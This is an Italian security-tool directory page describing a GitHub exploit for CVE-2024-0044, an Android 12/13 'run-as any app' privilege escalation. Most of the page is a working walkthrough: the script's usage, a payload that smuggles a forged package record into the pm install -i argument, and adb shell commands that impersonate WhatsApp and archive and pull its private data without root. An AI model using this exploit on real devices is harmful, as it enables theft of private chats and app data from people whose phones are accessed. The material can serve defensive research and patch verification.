Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
c-CVE-2024-0044 — CVE-2024-0044: una vulnerabilità ad alta gravità del tipo "eseguire come qualsiasi applicazione" che riguarda le versioni 12 e 13 di Android | Kitploit
Strumenti/GitHubGitHub/007criptografia/c-cve-2024-0044
Sicurezza AndroidEscalation di PrivilegiAnalisi delle VulnerabilitàExploitPentesting di App MobiliEsfiltrazione DatiPost-ExploitPenetration TestingSicurezza Mobile

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub007criptografia/c-cve-2024-0044

c-CVE-2024-0044

CVE-2024-0044: una vulnerabilità ad alta gravità del tipo "eseguire come qualsiasi applicazione" che riguarda le versioni 12 e 13 di Android

Vedi Repository
4152 anni faNon ancora revisionato

CVE 2024 0044

CVE-2024-0044, identificata nella funzione createSessionInternal del file PackageInstallerService.java, è una vulnerabilità ad alta severità che interessa le versioni Android 12 e 13. Questa vulnerabilità consente a un attaccante di effettuare un attacco "run-as any app", portando a un'escalation locale dei privilegi senza richiedere interazione da parte dell'utente. Il problema sorge a causa di una convalida impropria degli input all'interno della funzione createSessionInternal. Un attaccante può sfruttare questa vulnerabilità manipolando il processo di creazione della sessione, ottenendo potenzialmente accesso non autorizzato a dati sensibili ed eseguendo azioni non autorizzate sul dispositivo interessato.

Lo sfruttamento è stato scoperto da Meta security

Il proof of concept è stato riassunto e condiviso da Tiny hack

I dettagli sulla patch di sicurezza si trovano nel bollettino di sicurezza Android

Prerequisiti

  1. Abilita il debug USB sul tuo telefono e collegalo al tuo computer utilizzando un cavo USB o il debug wireless.
  2. Scarica un qualsiasi apk sul tuo computer, puoi usare F-DROID

Come usare lo strumento

root@kitploit:~
python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

-P è usato per specificare il nome del pacchetto target su cui vuoi eseguire come

-A per specificare il percorso del file apk da caricare nel dispositivo

Sfruttamento

Esegui lo strumento python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

Verrà generato un file payload.txt come questo

root@kitploit:~
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

Lo strumento automatizza alcune parti e altre sono manuali. Puoi uscire dopo la generazione del payload ed eseguire tutti i comandi manualmente, oppure continuare con le istruzioni

Successivamente dovrai connetterti al dispositivo usando adb shell e incollare il payload, assicurandoti di ricevere un messaggio di Success dopo l'ultimo comando

root@kitploit:~
pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

Poi otteniamo i dati di whatsapp usando i seguenti comandi

root@kitploit:~
pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

Crea una directory temporanea: mkdir /data/local/tmp/wa/

Crea un segnaposto per un file tar: touch /data/local/tmp/wa/wa.tar

Imposta permessi estesi: chmod -R 0777 /data/local/tmp/wa/ per garantire che qualsiasi utente possa leggere, scrivere ed eseguire in questa directory.

Cambia contesto utente: run-as victim per ottenere gli stessi permessi dell'utente "victim".

Archivia i dati dell'applicazione target: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp, creando un archivio tar della directory dei dati di WhatsApp.

Infine estrai i dati

adb pull /data/local/tmp/wa/wa.tar

Puoi estrarre i dati usando 7z o qualsiasi altro strumento

Puoi usare Whatsapp chat exporter per convertirli in HTML

Questo ti permette di ottenere i dati di whatsapp senza accesso root sul tuo dispositivo

Scarica lo strumento